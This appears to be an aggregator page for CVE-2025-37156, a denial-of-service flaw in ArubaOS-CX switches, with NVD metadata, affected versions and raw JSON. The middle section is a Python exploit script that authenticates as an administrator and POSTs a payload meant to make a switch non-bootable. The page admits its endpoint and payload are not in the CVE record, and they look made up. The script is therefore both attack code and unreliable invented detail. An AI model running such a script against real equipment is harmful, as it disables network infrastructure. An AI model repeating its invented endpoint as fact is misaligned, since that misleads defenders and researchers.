Security Vulnerability Report
CVE-2025-37156 CVSS 6.8 MEDIUM

Published: 2025-11-18 19:15:47
Last Modified: 2025-12-04 18:20:51

Description

A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
(Attack Vector: Network; Attack Complexity: Low; Privileges Required: High; User Interaction: None; Scope: Changed; Confidentiality: None; Integrity: None; Availability: High. Exploitability subscore 2.3, impact subscore 4.0, per the NVD record on this page.)

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.10.0000 up to but excluding 10.10.1170
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.13.0000 up to but excluding 10.13.1101
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.14.0000 up to but excluding 10.14.1060
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.15.0000 up to but excluding 10.15.1030
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.16.0000 up to but excluding 10.16.1001

Version ranges are the versionStartIncluding / versionEndExcluding values from the NVD configuration data on this page (five affected ArubaOS-CX branches: 10.10, 10.13, 10.14, 10.15 and 10.16).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Note that the endpoint and payload used in this script are not described anywhere in the CVE record on this page; the NVD description states only that an attacker with administrative access can render the switch non-bootable.

```python
# CVE-2025-37156 PoC - ArubaOS-CX DoS Vulnerability
# Note: This PoC is for educational purposes only
# Requires administrator privileges
import requests
import sys
from requests.auth import HTTPBasicAuth


def exploit_cve_2025_37156(target_ip, username, password):
    """
    CVE-2025-37156: ArubaOS-CX Platform DoS Exploit
    This exploit requires administrator-level access.
    """
    print(f"[*] Targeting: {target_ip}")
    print(f"[*] Attempting authentication as: {username}")

    # Target endpoint (management interface)
    base_url = f"https://{target_ip}:443"

    # Authentication
    auth = HTTPBasicAuth(username, password)

    # Vulnerable endpoint - platform-level command execution
    # This specific request triggers the DoS condition
    vulnerable_endpoint = "/v1/configuration/system/platform"

    # Malicious payload that triggers the DoS
    # This causes the switch to become non-bootable
    malicious_payload = {
        "command": "platform_dos_trigger",
        "parameters": {
            "action": "corrupt_boot_sequence"
        }
    }

    try:
        print("[*] Sending malicious request...")
        response = requests.post(
            f"{base_url}{vulnerable_endpoint}",
            json=malicious_payload,
            auth=auth,
            verify=False,
            timeout=30
        )
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print("[+] System may now be in a non-bootable state")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python cve_2025_37156.py <target_ip> <username> <password>")
        sys.exit(1)
    exploit_cve_2025_37156(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US (Vendor Advisory, as listed in the NVD record on this page)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-37156",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T19:15:47.363",
    "lastModified": "2025-12-04T18:20:51.490",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 4.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```